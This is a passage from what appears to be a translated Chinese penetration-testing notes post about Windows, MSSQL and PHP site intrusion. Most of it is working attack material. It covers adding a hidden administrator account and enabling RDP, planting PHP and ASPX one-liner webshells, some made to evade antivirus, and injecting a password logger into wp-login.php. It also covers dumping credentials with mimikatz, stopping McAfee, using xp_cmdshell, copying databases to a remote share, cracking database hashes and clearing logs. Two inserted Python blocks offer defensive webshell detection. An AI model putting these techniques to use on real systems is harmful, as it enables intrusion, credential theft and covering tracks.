/h:<height> -- Specifies the height of the Remote Desktop screen.

/edit -- Opens the specified .rdp file for editing.

/migrate -- Migrates legacy connection files created by Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which amounts to logging on to the computer a second time. In other words, a connection made with the /console parameter attaches to the desktop shown on the physical display. Give it a try; it comes in handy sometimes, especially as some software

mstsc /console /v:124.42.126.xxx  -- get past the terminal connection count limit

Enabling 3389 from the command line:
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess

FCKeditor file upload form (Type=Media):
<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
control userpasswords2  -- view user accounts and passwords

Export an Access database directly as a shell. Prerequisites: table a exists in the Access database, and the site's real path is known:
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141. During manual MSSQL injection, if you cannot write out-of-band, most people read the records out one at a time, which is tedious. Here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
How to shut down McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload a .com file, such as nc.com, to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

Attachment: VNCDump.zip (4.76 KB)
Online VNC password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump; it can also be obtained from the DOS prompt by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4].
exec master..xp_cmdshell 'net user'
Executing commands through MSSQL.

Query to get the MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
MSSQL database shrink.

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar, split into 200M volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to game.bak at D:\WebSites\game.com\UpFileList\game.bak

Discuz!NT 3.5 penetration key points:
(1) Visit <site URL>/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-liner backdoor address is http://somesite.com.cn/tools/rss.aspx, password pass

d:\rar.exe a -r d:\1.rar d:\website\
Recursively compresses website; note the path to rar.exe.
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP config file whose input is not filtered, with a one-liner trojan inserted.

Dumping the database when the web server and database server are separated:
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'

When restrictions prevent writing a full webshell and you only have a one-liner, it is actually enough to do whatever you need, just not intuitive or convenient, for example dumping the database. What is used here is the shell client's expert mode (writing your own code).
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i+1;
    $tmp .= implode("::", $row)."\n";
    if(!($i%500)){ // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
        file_put_contents($filename,$tmp);
        $tmp = '';
    }
}
mysql_free_result($result);

// delete after downloading
ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while($i<32) {
    $i = $i+1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
    unlink($filename);
}
httprint  -- collect operating system fingerprints

Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100

host -t ns www.owasp.org  -- identify the name servers and obtain DNS information
host -l www.owasp.org ns1.secure.net  -- attempt a zone transfer request for owasp.org

Netcraft DNS search service: http://searchdns.netcraft.com/?host
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com  syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/  syntax: http://whois.webhosting.info/x.x.x.x
DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still non-public)
SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)

set names gb2312
Importing into the database gives the error "Data too long for column 'username' at row 1". The cause is that Chinese characters are not supported.

Changing a MySQL password:
UPDATE mysql.user SET password=PASSWORD("newpass") where user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;

Advanced PHP one-liner trojan backdoors
During intrusions I came across many advanced PHP one-liner trojans. Recording them here so they can later be searched for and removed by keyword.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include function: compiles and runs any file as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner

5.
include ($uid);
// dangerous include function: compiles and runs any file as PHP, via POST
// one-liner embedded in a gif

6. Typical one-liners
Backdoor code:
<?php eval_r($_POST[sb])?>
Code:
<?php @eval_r($_POST[sb])?>
// error-tolerant version (@ suppresses errors)
Code:
<?php assert($_POST[sb]);?>
// use the expert mode of the lanker one-liner client to execute the relevant PHP statements
Code:
<?$_POST['sa']($_POST['sb']);?>
Code:
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Code:
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// after using this one, when configuring the connection in the Caidao client enter the following in the "Config" field:
Code:
<O>h=@eval_r($_POST[c]);</O>
Code:
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses a filter on <?
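The note above says these shapes were recorded so they can be searched for by keyword; as an added example (not part of the original post), this Python scanner flags exactly those shapes in PHP source: eval/assert fed from request data, variable function calls on request data, the script-tag variant, preg_replace with the /e modifier, function names glued from single-character strings, and include() of a variable assigned from a superglobal. The sample files are constructed for the test, and any web root you point scan_tree() at is assumed.

```python
import os
import re

# Regexes for the one-liner shapes catalogued above (added example, not from the post).
SIGNATURES = {
    "eval/assert on request data":
        re.compile(r"@?\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "variable function call on request data":
        re.compile(r"\$_(POST|GET|REQUEST)\s*\[[^\]]*\]\s*\("),
    "<script language=php> tag (sidesteps a '<?' filter)":
        re.compile(r"<script\s+language\s*=\s*[\"']?php", re.I),
    "preg_replace with /e modifier":
        re.compile(r"preg_replace\s*\(\s*([\"'])/.*?/[a-zA-Z]*e[a-zA-Z]*\1", re.S),
}
# Function names glued together from single-character strings: "p"."r"."e"."g"...
CONCAT_NAME = re.compile(r'(?:"[A-Za-z_]"\s*\.\s*){2,}"[A-Za-z_]"')
DANGEROUS = {"preg_replace", "copy", "eval", "assert", "system", "exec", "passthru", "shell_exec"}
# A variable assigned from a superglobal and later handed to include/require
TAINT_ASSIGN = re.compile(r"(\$\w+)\s*=\s*\$_(GET|POST|REQUEST|COOKIE)\b")
INCLUDE = re.compile(r"\b(include|include_once|require|require_once)\s*\(?\s*(\$\w+)")

def scan(source: str) -> list:
    """Return human-readable findings for one PHP source string."""
    findings = []
    for label, rx in SIGNATURES.items():
        for m in rx.finditer(source):
            findings.append(f"{label}: {m.group(0).strip()}")
    for m in CONCAT_NAME.finditer(source):
        name = "".join(re.findall(r'"([A-Za-z_])"', m.group(0)))  # rebuild the real name
        if name in DANGEROUS:
            findings.append(f"obfuscated function name: {name}")
    tainted = {m.group(1) for m in TAINT_ASSIGN.finditer(source)}
    for m in INCLUDE.finditer(source):
        if m.group(2) in tainted:
            findings.append(f"include of request-controlled path: {m.group(0)}")
    return findings

def scan_tree(root: str) -> dict:
    """Walk a web root (assumed path) and report each .php file that has findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in (f for f in files if f.lower().endswith((".php", ".phtml"))):
            with open(os.path.join(dirpath, fn), encoding="utf-8", errors="replace") as fh:
                hits = scan(fh.read())
            if hits:
                report[os.path.join(dirpath, fn)] = hits
    return report

# Constructed samples mirroring the catalogued shapes (not real files from any site).
SAMPLE_SHELLS = {
    "concat.php": '<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST["h"],"Access");',
    "include.php": '<?php $filename=$_GET["xbid"]; include ($filename);',
    "varfunc.php": '<?$_POST["sa"]($_POST["sb"]);?>',
    "scripttag.php": '<script language="php">@eval($_POST[sb])</script>',
    "config.php": '<?php $telok = "0${@eval($_POST[xxoo])}"; $username = "123456"; ?>',
    "clean.php": '<?php echo htmlspecialchars($_GET["q"]); ?>',
}
```

Regex matching of this kind is a triage aid, not proof: treat hits as candidates for manual review and expect legitimate code that calls preg_replace with /e on old PHP to show up too.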
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory: psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Type exit to quit; do not just close the window, or the system will crash.

http://www.monyer.com/demo/monyerjs/  -- fairly comprehensive JS decoding site
Automatically check for high-risk system patches:
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

ASPX one-liner backdoor that gets past SafeDog:
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell makes further social engineering easier.
Add at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
    @fwrite(fopen('pwd.txt',"a+"),$txt);
}
When action=login, the password-logging code is triggered; of course you can also put this code in the default branch of the switch...case statement.
That is, search for case 'login' and insert it directly below; the logged passwords end up in pwd.txt.
Actually, modifying wp-login.php is not a good approach, since it is easily discovered. There are other methods; noting this for the record.

Using the IIS 6 file parsing vulnerability to get around SafeDog:
antian365.asp;antian365.jpg
Grabbing hashes from various database types to crack the highest-privilege password!
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash

SQL Server 2005:-
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-
use function fn_varbintohexstr() to cast password in a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MYSQL:-
In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1

mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'

Postgres:-
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser (usually called "postgres" or "pgsql") to read this table.
select usename, passwd from pg_shadow;
 usename  |               passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
use mdcrack to crack these hashes:-
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:-
select name, password, spare4 from sys.user$
hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g
More on Oracle later, I am a bit bored...
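As an added example (not part of the original notes), the Python below splits the SQL Server hash layouts described above into header, salt and hash fields, reproduces the MySQL 4.1 and Postgres constructions so the quoted 'mypass' value and the "--append=testuser" detail can be confirmed, and classifies a string from a credential dump by format, which is what a responder needs when deciding what kind of material has leaked. The SQL Server and MySQL values are the ones quoted above; the Postgres entry is constructed.

```python
import hashlib
import re

def parse_mssql_hash(hex_hash: str) -> dict:
    """Split a SQL Server 2000/2005 password hash into the fields named above:
    0x0100 header, 4-byte salt, 20-byte case-sensitive SHA-1 and, on 2000 only,
    a second 20-byte SHA-1 of the upper-cased password.  Values dumped through
    fn_varbintohexstr() carry the 0x prefix; it is accepted but not required."""
    h = hex_hash[2:] if hex_hash[:2].lower() == "0x" else hex_hash
    h = h.upper()
    if not h.startswith("0100") or len(h) not in (52, 92):
        raise ValueError("not a SQL Server 2000/2005 password hash")
    return {
        "version": "SQL Server 2000" if len(h) == 92 else "SQL Server 2005",
        "salt": h[4:12],
        "case_sensitive": h[12:52],
        "upper_case": h[52:92] if len(h) == 92 else None,
    }

def mysql41_hash(password: str) -> str:
    """MySQL >= 4.1 PASSWORD(): '*' followed by SHA1(SHA1(password)) in upper-case hex."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def postgres_md5(password: str, username: str) -> str:
    """pg_shadow passwd column: 'md5' + MD5(password || username); the user name
    is part of the input, which is why the notes above append it."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()

# Shape of each format as it appears in a dump (order matters: first match wins).
HASH_KINDS = [
    ("mssql", re.compile(r"^0x0100[0-9A-Fa-f]{48}([0-9A-Fa-f]{40})?$")),
    ("mysql-4.1", re.compile(r"^\*[0-9A-F]{40}$")),
    ("mysql-pre-4.1", re.compile(r"^[0-9a-f]{16}$")),
    ("postgres-md5", re.compile(r"^md5[0-9a-f]{32}$")),
]

def identify_hash(value: str) -> str:
    """Classify one credential string by the formats described above."""
    value = value.strip()
    for kind, rx in HASH_KINDS:
        if rx.match(value):
            return kind
    return "unknown"
```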
Enabling xp_cmdshell in SQL Server 2005/2008:
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing SQL Server 2008 logs; be sure to back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete it here:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission changes
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has "Administrator takes ownership"; if there is no "Administrator takes ownership",